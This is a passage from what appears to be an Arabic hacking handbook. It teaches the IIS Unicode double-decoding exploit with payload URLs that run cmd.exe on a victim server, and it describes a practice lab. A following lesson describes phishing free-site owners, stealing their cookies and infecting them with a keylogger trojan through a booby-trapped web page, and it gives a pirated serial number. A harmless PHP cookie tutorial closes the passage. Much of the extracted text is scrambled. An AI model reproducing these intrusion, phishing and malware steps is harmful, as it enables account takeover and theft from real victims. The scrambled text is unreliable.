..‫بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى ‪( executable directory‬‬ ‫و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم ‪ iis‬و‬ ‫ملحوظه هامه‪ ::‬ل يوجد على كل ملقم ‪ iis‬هذا الفولدرالتنفيذى اى ‪executable directory‬‬ ‫و اعتقد ان الصديق بلك هنتر و الخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم )فأنا اريد ان‬ ‫اربط الدروس مع بعض حتى تكون سلسله متكامله (‬ ‫* ‪ <=== winnt/system32/cmd.. arguments‬و بعدها يظهر لنا‬ ‫‪ arguments‬كثيره و منها الذى نستعمله دائما فى الثغره و هو ‪ c/‬شوفو كده ما المكتوب امامه ‪::‬‬ ‫‪ Carries out the command specified by string and then terminates‬و هذا‬ ‫الكلم معناه انه ينفذ المر الموجود فى سطر الوامر ثم ينتهى و طبعا هذا للوامر العاديه التى نعرفها‬ ‫تعالو نشوف السطر الى تحتيه ‪::‬سوف نجد انه يتكلم عن ‪ argument‬ل نراه فى ثغره اليونى كود و هو ال‬ ‫‪ k/‬شوفو ايه مكتوب امامه‪::‬‬ ‫‪ Carries out the command specified by string but remains‬و طبعا معناه انه ينفذ‬ ‫الوامر الموجوده فى السطر و لكن يستمر مفعولها )ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو‬ ‫مكتوب امامى و لكن تقدر تقول انها الوامر التى تأخذ فتره طويله حبتين مثل ‪ ping‬مثل (‬ ‫و مثل هناك ‪ argument‬أخر مثل ‪ Q/‬و هذا نستخدمه فى اغلق تفعيل امر ‪ echo‬كما هو واضح فى‬ ‫المثال فوق‬ ‫و هناك الكثير من هذه ال ‪ arguments‬و طبعا منها ما هو اساسى ل يمكنك التحكم فيه )يعنى فتحه او‬ ‫غلقه مثل ال ‪ c/‬و ال ‪ ( k/‬و هناك اخرين يمكنك ان تجعلهم ‪ on‬او ‪ off‬و بهذا تكون انت تتحكم بحاله ال‬ ‫‪ cmd‬خاصتك )ياريت تنفذ المر و تقرأ المكتوب لنك راح تلقى تفاصيل الفتح و الغلق بالتفصيل ( و‬ ‫اصبروا على قليل حتى انتهى من المتحان الول فى ‪ MCSE‬فى خلل اسبوعين ان شاء ال تعالى و بعد‬ ‫ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء ال بس اصبرو شوى‬ ‫‪141‬‬ .‬سيظهر لك كلم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى‬ ‫شوف ايه الى راح يظهر لك ‪::‬‬ ‫‪Starts a new instance of the Windows 2000 command interpreter‬‬ ‫‪[CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF‬‬ ‫]]‪[S] [/C | /K] string/‬‬ ‫‪C Carries out the command specified by string and then terminates/‬‬ ‫‪K Carries out the command specified by string but remains/‬‬ ‫‪(S Modifies the treatment of string after /C or /K (see below /‬‬ ‫‪Q Turns echo off/‬‬ ‫‪(D Disable execution of AutoRun commands from registry (see below /‬‬ ‫هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اول يقولك ‪::‬‬ ‫‪ Starts a new instance of the Windows 2000 command interpreter‬و هذه‬ ‫الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز ‪ 2000‬و هذا طبعا وضح لنا ان كل ‪cmd‬‬ ‫يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال ‪ .exe‬و طبعا هذا هو ال ‪ cmd‬الذى يسمح لنا بأدراج سطور‬ ‫الوامر التى نريد تنفيذها )و على فكره ممكن تستعمل هذا ال ‪ cmd‬فى استخدام اوامر مثل ‪ ping‬و‬ ‫‪ netstat‬و ‪. traceroute‬الخ اعتقد انها فكره لم يلحظها بعضنا (‬ ‫* ؟‪ -‬علمه الستفهام تخيلو حتى علمه الستفهام فى هذه الثغره لها دور فهذه العلمه تعنى الحاله التى ينفذ‬ ‫بها المر )طبعا مش فاهم يعنى ايه ( و ل يهمك تعالى معى افهمك يعنى ايه علمه الستفهام تعنى كلمه‬ ‫‪ argument‬و هذه الكلمه هى التى تعنى الحاله التى سينفذ بها المر اى انه امر مثل ينفذ فى لحظه ثم‬ ‫ينتهى مثل ‪ copy‬مثل ام انه امر مثل ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الوامر التى‬ ‫نستخدمها هى الوامر العاديه و هى من نوع ‪ argument /c‬و هذا ال ‪ c/‬يعنى ان المر ينفذ فى لحظه ثم‬ ‫ينتهى‬ ‫تعالى افهمك اكثر ‪ ::‬لو عندك ويندوز ‪ 2000‬افتح ال ‪ cmd‬بتاعك و اكتب هذا )‪ (?/ cmd‬و اضغط‬ ‫انتر ‪.

+c/‬و بالتالى كما عرفنا فوق انا ‪ c/‬هى ال ‪ argument‬لل ‪ cmd.‬انت تشغل ال ‪ cmd.exe‬او الحاله التى سينفذ عليها‬ ‫ال ‪ cmd‬المر اما علمه ال ‪ +‬التى بجانب ال ‪ c/‬فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ل يمكننا‬ ‫اسبدالها بمسافه عاديه و بعدها يكون المر الذى يحمله سطر الوامر لينفده ثم علمه ‪ +‬ثانيه و بعدها اسم‬ ‫الدرايف الذى تعرض محتوياته على الشاشه حاليا ‪. ( enjoy this‬حيث تصبح الثغره بهذا الشكل ‪::‬‬ ‫‪http://issserver/scripts/./‬‬ ‫ولكن ما الذى نحاول ان نفعله بهذه التحليلت الغريبه ؟‬ ‫فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن للسف ل يمكنك تغيير او اللعب فى‬ ‫الديريكتورز لن ال ‪ iis‬مزود بخاصيه عمل ‪ check‬على مثل هذه الديكودز و منعها من التنفيذ و هنا يقع‬ ‫اصل ثغره اليونى كود و هو التحليل لمرتين او لكثر من مره فهمتم قصدى الن اى ان ال ‪ iis‬مزود فعل‬ ‫بخاصيه ال ‪ check‬على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقع‬ ‫و لذلك يقوم ال ‪ iis‬بوظيفته المعتاده و هى ال ‪ check‬و المنع على الديكود الول و يظهر له ان كل شئ‬ ‫بخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل ال ‪ check‬مره واحده فتكون‬ ‫النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى‬ ‫هو ان يرجع الى اصله اى ‪( slash) /‬‬ ‫و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ‪::‬‬ ‫شوفو فيه ماده اسمها ‪ computer logic‬و الماده دى راح درس فيها شئ يسمى ‪HexaDecimal‬‬ ‫‪ Values‬و هذه ال ‪ values‬هى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه‬ ‫مثل ‪ /‬فى الكمبيوتر لها ما يسمى بال ‪ hex value‬تعالى اوضحلك اكثر ‪::‬‬ ‫مثل‪ 20% :‬تعنى مسافه )‪(space‬‬ ‫هذا مثال بسيط و اعتقد انك فهمت الن كلمى و طبعا يوجد جدول لهذه ال ‪ hex values‬المساويه‬ ‫للحروف و الحركات العاديه فى الكمبيوتر ‪ ..‬‬ ‫تعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ‪.%255c.‬‬ ‫**و نأتى الن لهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلم )هو ان سبب الثغره‬ ‫يكون حل شفره العنوان اكثر من مره (و هذا ما نطلق عليه ال ‪ decode‬و انا شخصيا افصل الديكودز على‬ ‫انه تحليل حتى نصل لبسط الحل كما فى الرياضيات يعنى ‪ simplyfiey‬اى تبسيط و فك المعادله تعالو‬ ‫خلينا نفهمكم هذا على الثغره نفسها ‪::‬‬ ‫‪ %255c.../‬هذا هو الديكود اى التحليل للصل ‪../ping.exe‬لنك تريد ان تتحكم بالموقع و‬ ‫تغير الندكس و الخ و و لكن تعالى مثل نشغل اى ملف تانى ياترى كيف نشغله ؟‬ ‫انا راح اقلك كيف ‪::‬كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل‬ ‫‪ Ping.exe+PRINT‬بل من ‪ cmd.exe?/c‬و بهذا تكون قد شغلت الفايل الذى تريده‬ ‫)‪.‫اعتقد انك الن فهمت ما هى ال ‪ arguments‬و ما فائده ‪ c/‬التى تكتبها فى الثغره و انا متأكد انك ل تعرف‬ ‫معناها ‪...%. 5c% = /‬طبعا هذا هو الديكود الول الذى ستفكر الن‬ ‫فى انك تحذف ال ‪ /‬و تضع بدل منها هذا ال ‪ value‬فتنجح الثغره و لكن انا اقول لك هذا خطأ لن هذا هو‬ ‫الديقود الول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الول فستجد ان‬ ‫ال ‪ iis‬لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال ‪ value‬حتى‬ ‫يتم الديكود التانى فتنجح الثغره‬ ‫و بالنظر الى جدول ال ‪ hexadecimal values‬شوف نجد هذا ‪::‬‬ ‫‪%25 = %‬‬ ‫‪142‬‬ ..exe+PRINT‬‬ ‫* ‪ ..‬اذن اعتقد انك ادركت تماما الن انك ترسل ‪hex values‬‬ ‫عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او ال‬ ‫‪decode‬‬ ‫تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال ‪ ( slash) /‬حيث انها من‬ ‫اساسيات الديكود فى هذه الثغره ‪::‬‬ ‫شوف فى جدول ال ‪ hex value‬راح نجد ان ال ‪ ..%5c.

checker‬‬ ‫و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض‬ ‫سوف نضع الثغره فى هذا الشكل ‪::‬‬ ‫‪http://iisserver/scripts/.‬‬ ‫فهمتم الن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار‬ ‫التحليل الول مرتين و لكن معناه تحليل و فك التحليل الول اى ‪ simplify‬الى ابسط و اطول صوره ممكنه‬ ‫فى نفس الوقت‬ ‫و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ‪::‬‬ ‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬ ‫‪%%35c % = % %35 = 5 c = c = %5c‬‬ ‫‪c = %5c = %63 5 = %35 % = % %%35%63‬‬ ‫‪c = %5c = %63 5 = %35 % = %25 %25%35%63‬‬ ‫ثم ‪/= 5c% :‬‬ ‫ارائيتم التحليل طبعا فى الخر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تساوى‬ ‫‪ 5c%‬و كما ذكرنا ‪ / = 5c%‬و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال ‪iis‬‬ ‫‪...%5c.%..xe?/c+dir+c:+/s‬‬ ‫و ستدخلون على الموقع بنجاح و لكن اكيد تلحظون شئ جديد قد زاد على الثغره و هذا الشى هو ‪s/+‬‬ ‫هذا الرمز‬ ‫و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى‬ ‫كمبيوتر الويب سرفر‬ ‫و ال تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل‬ ‫الخوه و ان شاء ال انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الول فى ‪) MCSE‬ادعولى‬ ‫بالنجاح ( و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز ‪ 2000‬و كيفيه اختراقها و فائده ال‬ ‫‪.‫‪%35 = 5‬‬ ‫‪c = %63‬‬ ‫و بالتالى نجد انفسنا قد خدعنا ال ‪ iis checker‬بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل‬ ‫على الصل و هو ‪ /‬و بالتالى تكون قد نجحت الثغره ‪.WIN2000 RESOURCE KIT‬‬ ‫انتهى‪،،،‬‬ ‫‪143‬‬ ..

‫" تدريب على عملية الختراق بواسطة اليونيكود "‬ ‫>ةةةةةة‪ :‬ةةةة ةةة <‬ ‫بسم ال الرحمن الرحيم‪...‬‬ ‫اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي‪:‬ـ‬ ‫قم بوضع الموقع في مجلد ‪wwwroot‬الموجود داخل مجلد ‪ Inetpub‬طبعا هتدخل عليه بعد ما تشغل‬ ‫السيرفر ‪ IIS‬عن طريق‬ ‫‪/http://127.‬‬ ‫انتهى‪،،،‬‬ ‫‪144‬‬ .....‬‬ ‫كثر الكلم عن إختراق المواقع بأنواعه واليوم عندي شرح عن الختراق عن طريق اليونيكود أو بالصح‬ ‫تطبيق عملي على كيفية الختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن ال‬ ‫سيوصلهم إلى طريق الحتراف ‪..‬‬ ‫‪ *4‬قم بوضع علمة صح على الخيار الول “‪..0.‬‬ ‫سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع‬ ‫مصاب‪.0.‬‬ ‫لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز ‪ 2000‬على جهازك ‪ ...‬‬ ‫******************‬ ‫بسم ال نبدأ‪..‬‬ ‫‪ *3‬قم بالنقر على زر " إضافة إزالة مكونات ويندوز "‪.‬‬ ‫‪ *2‬قم بالنقر على إضافة إزالة برامج‪.01‬‬ ‫وليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن‬ ‫الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو ‪/http://127.‬وفي نفس السيدي تبع النظام‬ ‫تقوم بإضافة سيرفر ‪ IIS‬وذلك عن طريق ‪:‬‬ ‫‪ *1‬قم بالذهاب إلى لوحة التحكم‪.1‬‬ ‫وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود‪.0..”IIS‬‬ ‫هذا بالنسبة لكيفية تنزيل السيرفر‪.

‬ايميل‪.‬ان اختراقها اسهل مماتتصور‬ ‫الساسيات لختراق كل شي هو الكوكيز لنه يحتوي على جميع المعلومات))الموقع‪.‬الخ وتستطيع التوصل له ببعض الطرق=‪-‬‬ ‫ثالثا=‪-‬‬ ‫عليك اول ايجاد الكواد الزمه لسرقه الكوكيز من المتصفح=‪-‬‬ ‫لنــبدأ الشرح‬ ‫النقطه الولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه‬ ‫المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الكسبلور‬ ‫المناسب لتصفح الموقع=المناسب لتصميمه=نفس الصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها‬ ‫لختراق المواقع المجانيه‬ ‫واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه‬ ‫الكوكيز))ساضعها هنا لحقا((والن بعدما حصلت على هذه الكواد تضعها في صفحه وتحاول جذب الضحيه‬ ‫للتوجه لها وهناك عده طرق‬ ‫‪-1‬تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق‬ ‫عنده))هههههههه حب مصلحه((وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد‬ ‫‪145‬‬ ....‬الخ((‬ ‫ولكن يجب ان تعرف عده نقاط مهمه لختراق اي موقع مجاني‬ ‫اول=‪-‬‬ ‫يجب عليك معرفه نوعيه اصدار المتصفح‬ ‫ثانيا=‪-‬‬ ‫عليك معرفه بعض بيانات صاحب الموقع مثل اليميل‪...‫" شرح مفصل لكيفية اختراق المواقع المجانية "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<De\/iL Ni9hT‬‬ ‫=سهوله اختراق المواقع المجانيه=‪-‬‬‫نعم‪.

5‬‬ ‫هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ))راجع درس "سهوله اختراق‬ ‫المواقع المجانيه"((‬ ‫اول لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في‬ ‫الكيبوردوليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل‬ ‫الى جهازه‪.8m..com‬‬ ‫فهذا معناه ان الموقع مقدم من شركه فري سيرفر ‪FreeServerS‬وتستطيع معرفه النطاق المحدده‬ ‫بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه))‪..thecorpz...name.zip‬‬ ‫‪146‬‬ .com/kk2000pro.‫‪-2‬مثل تحدد نوعيه الشركه الى مقدمه الستضافه المجانيه للموقع فمثل اذا كان عنوان الموقع‬ ‫‪/http://www.org/activex/gwpackage.5‬هذه هي‬ ‫سر المهنه((ووصلته‬ ‫‪http://www.s5‬الخ‬ ‫وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم‬ ‫وتغيير محتوى الرساله))طبعا بالعنقليزي((وارسال رساله منه تتطلب منه فتح موقع))موقعك الى فيه‬ ‫الكود((مثل لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع‬ ‫الشركه وسيفتح الموقع حال‬ ‫واذا لم يضع ايميله فهناك طريقه وهى انك مثل تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني‬ ‫مثل تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك))وهو للمره المليون اقلكم الموقع‬ ‫الى فيه الكود((او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع‬ ‫بالثغرات وهو صعب جدا جدا‬ ‫النقطه الثالثه وهي الكوكيز=‪-‬‬ ‫يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الكواد الخاصه بالمتصفحات مع طريقه‬ ‫التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك‬ ‫طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح ‪IE 5 IE 5.mikkotech.8m..‬‬ ‫اول قم بتحميل برنامج ‪keykey2000‬وهذا البرنامج يسجل كل شي بالكيبورد والشياء الى كنت تعمل بها‬ ‫ويرسلها على اليميل وانا مجربه وليستطيع النورتون الجديد والزرار الثلثه للغاء العمليات النشطه في‬ ‫النظام ايقافه ووصلته‬ ‫‪http://www.exe‬‬ ‫والسيريال نمبر‬ ‫‪SN: K100-43-109-0-793218E876A4C9-29‬‬ ‫والبرنامج سهل جدا ول يحتاج لشرح واذا اردتم شرحه كلمونيوالن بعدما جهزت ملف الباتش بهذا البرنامج‬ ‫قم بتحميل برنامج ‪godwill‬وهو البرنامج الخاص للغام الموقع على انترنت اكسبلور ‪ 5‬و ‪))5..

.html‬‬ ‫===================نهايه الشـــرح====================‬ ‫وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل‬ ‫التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الن انت تنتظر في بريدك الى حطيته في‬ ‫التروجان المعلومات عن الضحيه مثل))الموقع واليميل‪.‬‬ ‫‪147‬‬ .thecorpz.org/html/activesploits.‫====================الشــــرح=====================‬ ‫انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لنه سهل جدا‬ ‫عندما تفتح البرنامج ستظهر لك لوحه اختار منها‬ ‫‪enter‬في السفل وستظهر لك القائمه والذى يهمنا منها‬ ‫‪Upx‬وهذا لتشفير الباتش))اظننا خرجنا عن موضوعنا((‬ ‫‪Html‬وكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار‬ ‫منها‬ ‫‪General options‬وستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها‬ ‫‪enter exe file‬ومن هنا تضع الباتش الى سويته بشرط ال يكون حجمه كبير جدا))هل تفيدنا هذه‬ ‫المعلومه في شئ((‬ ‫‪enter html‬لستعراض صفحه من جهازك ثم الغامها وحط علمه صح جانب ‪use default‬‬ ‫‪page‬ليقوم البرنامج بعمل صفحه جديده‬ ‫وفي السفل ‪HTA File Name‬وهنا تضع اسم الصفحه وبعد النتهاء من ذلك نختار كلمه ‪Done‬ليقوم‬ ‫البرنامج بعمل الصفحه))وسيكون مكانها في نفس مجلد البرنامج((‬ ‫وارجو ان يكون الشرح واضحا‬ ‫واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع‬ ‫‪http://www.‬الخ((وهذه الطريقه تنفع ايضا لسرقه الشتراكات‬ ‫واساميه في المنتديات وايميله‪.

‬‬ ‫‪ -3‬قراءة الكعكات من جهاز العميل ‪.‬‬ ‫معلومات عامة‬ ‫ ما هي ملفات الكوكيز ؟‬‫ملفات الكوكيز عبارة عن ملفات نصية ‪ ،‬تقوم المواقع التي تزورها بإيداعها على القرص الصلب في‬ ‫جهازك ‪ ،‬وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ‪،‬‬ ‫أي عند زيارتك المقبلة للموقع ‪.‬‬ ‫اقسام الدرس ‪:‬‬ ‫‪ -1‬معلومات عامة ‪.‬يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ‪ ،‬بحيث يجري حذفها مباشرة عند إغلقك‬ ‫المتصفح ‪ ،‬ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"‪ ،‬يتم تخزينها لفترة محددة على القرص الصلب‬ ‫لحين انتهاء صلحيتها وقد تدوم صلحيتها مدة أشهر أو حتى سنوات ‪ .‬‬ ‫ كيف يتم إيداع ملفات الكوكيز على جهازك ؟‬‫يرسل المتصفح ‪ ،‬عند إدخالك عنوان موقع في شريط العناوين ‪ ،‬طلبًا إلى الموقع الذي حددته ‪ ،‬متضمنًا‬ ‫عنوان ‪ IP‬الخاص به ‪ ،‬ونوع المتصفح الذي تستخدمه ‪ ،‬ونظام التشغيل الذي يدير جهازك ‪ .‬أما بعض ملفات الكوكيز التي تعرض‬ ‫‪148‬‬ .‬تخّزن هذه‬ ‫المعلومات في ملفات خاصة بالمزود ‪ ، Log Files‬ول علقة للكوكيز بالمعلومات التي يتم إرسالها ‪ ..‬‬ ‫وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة‬ ‫الموقع ‪ ..‬‬ ‫‪ -2‬زراعة الكعكات على جهاز العميل ‪.‬‬ ‫وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لخر ‪ ،‬ولكن ليس بإمكان هذه المواقع‬ ‫استرجاع أي معلومات إضافية عنك أو عن جهازك ‪ ،‬باستثناء تلك المعلومات المخزنة في الملف النصي‬ ‫الخاص بها ‪ ،‬والتي تم إرسالها من قبل الموقع ‪ ،‬وبذلك ل تستطيع هذه المواقع الطلع على مضمون ملفات‬ ‫الكوكيز الخرى ‪ ،‬أو أي ملفات خاصة على جهازك ‪.‬‬ ‫‪ -4‬تطبيق ‪ :‬تخصيص لون الخلفية ‪.‬وفي‬ ‫الوقت ذاته يبحث المتصفح عن ملفات كوكيز ‪ ،‬التي تخص الموقع المطلوب ‪ ،‬فإذا وجدها يتم إرسالها مع‬ ‫طلب مشاهدة الموقع ‪ ،‬وإذا لم توجد ‪ ،‬فإن الموقع سيدرك أن هذه زيارتك الولى إليه ‪ ،‬فيقوم بإرسال ملفات‬ ‫الكوكيز إلى جهازك لتخزن عليه ‪..‬‬ ‫في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ‪.‫انتهى‪،،،‬‬ ‫" درس مفصل عن الكوكيز "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةة ةةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<Linux Girl‬‬ ‫مقدمة‬ ‫تعد الكعكات ) الـ ‪ ( cookies‬من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ‪ ،‬فبواسطتها ستتمكن من‬ ‫معرفة هل قام المتصفح بزيارة موقعك من قبل ام ل ‪.

(setcookie('site'. int secure .‬‬ ‫‪ <-‬ثالثًا ‪ :‬إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع ‪.‫تاريخ صلحية لتاريخ سابق ‪ ،‬فإنها ُتحذف مباشرة ول ُتخّزن على قرصك الصلب ‪ .'http://www.‬‬ ‫ مكونات ملف الكوكيز ‪:‬‬‫يتكون عادة من عدة اجزاء هي اسم الملف ‪ ،‬قيمته ‪ ،‬تاريخ انتهاء مفعوله ‪ ،‬الموقع المالك له ‪..time()+3600‬‬ ‫?<‬ ‫من الدوال المفيدة دالة ‪ time‬و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس )‬ ‫‪149‬‬ ....‬ل يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ‪ .com/'.‬وتعود المعلومات المخزنة‬ ‫في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ‪ ،‬وقد تعمم بعض الشركات الكبرى ملفات الكوكيز‬ ‫التي تصدرها على جميع مزوداتها ‪ ،‬لتنسيق المعلومات المتضمنة ‪ ،‬ولكي ل تصدر كل من مزوداتها ملفات‬ ‫كوكيز للمستخدم ذاته ‪ ،‬عند زيارته لصفحات مختلفة في الموقع ‪.‬‬ ‫زراعة الكعكات على جهاز العميل‬ ‫أول ‪ :‬كيف تزرع ملفات الكعكات ‪:‬‬ ‫يتم ذلك باستخدام الدالة ‪ setcookie‬و تعريفها بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪boolean setcookie ( string name [.‬‬ ‫‪ : expire‬اي عدد الثواني من بدية عصر اليونكس ) ‪ 1‬يناير ‪ ( 1970‬و التي بعدها سيقوم المتصفح على‬ ‫جهاز المستخدم بحذف الكعكة ‪ .....palhackerz..‬‬ ‫‪ : value‬القيمة ‪ . string value [..‬فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح السم هو‬ ‫الطريقة الوحيدة للتمييز ‪.‬فقط قيم نصية ‪ . int expire‬‬ ‫]‪([[[[[string path [....‬و هنا ثلث حالت ‪:‬‬ ‫‪ <-‬أوًل ‪ :‬أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة‬‫على جهاز العميل و تحذف عند انقضاء المدة ‪.‬؟ كيف ؟ ‪ :‬استخدم الدالة ‪ serialize‬لتحويل اي متغير في بي اتش‬ ‫بي الى شكل نصي و من ثم استخدم ‪ unserialize‬لعادته الى الشكل الطبيعي ‪..‬‬‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪. string domain [.‬‬ ‫تهمنا المدخلت الثلث الولى و هي ‪:‬‬ ‫‪ : name‬اي اسم الكعكة ‪ .‬‬ ‫‪ <-‬ثانيًا ‪ :‬أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ل يقوم المتصفح على‬‫جهاز العميل بتخزينها و اذا وجدت كعكة بنفس السم فانه يحذفها حتى لو لم تنتهي المدة ‪.‬لكن انتبه بامكانك‬ ‫وضع مصفوفة لكن بطريقة اخرى ‪ .

(setcookie('site'..‬‬ ‫ملحظة مهمة ‪:‬‬ ‫يجب ان تستدعي الدالة ‪ setcookie‬قبل أن ترسل اي شيء الى المتصفح ‪ ..(setcookie('site'.time()-360000‬‬ ‫?<‬ ‫ملحظات ‪:‬‬ ‫‪ -1‬عندما تحدد زمنا ماضيًا اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل ‪.‬فمثل الكود التالي لن ينجح ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪<body‬‬ ‫>?‬ ‫‪.''. (1970‬‬ ‫ثانيا كيف تحذف او تعدل كعكة‪:‬‬ ‫لكي تحذف كعكة عليك أن ترسل كعكة بنفس السم و خالية القيمة و ذات وقت اقل من الوقت على جهاز‬ ‫المستخدم‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.‫‪ 1‬يناير ‪.‬‬ ‫‪ -2‬لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد ‪.time()+20000‬‬ ‫?<‬ ‫>‪<html‬‬ ‫‪150‬‬ .(setcookie('site'. setcookie‬‬ ‫المثال السابق كان من الممكن ان يكون ‪:‬‬ ‫‪:code‬‬ ‫>? ‪.time()+20000‬‬ ‫‪.com'.com'.'palhackerz."echo " Alfjr..'palhackerz.com : the best islamic forum‬‬ ‫?<‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫بل لو كان هنالك مجرد سطر فارغ قبل علمة البداية ?< فلن تعمل الدالة ‪.

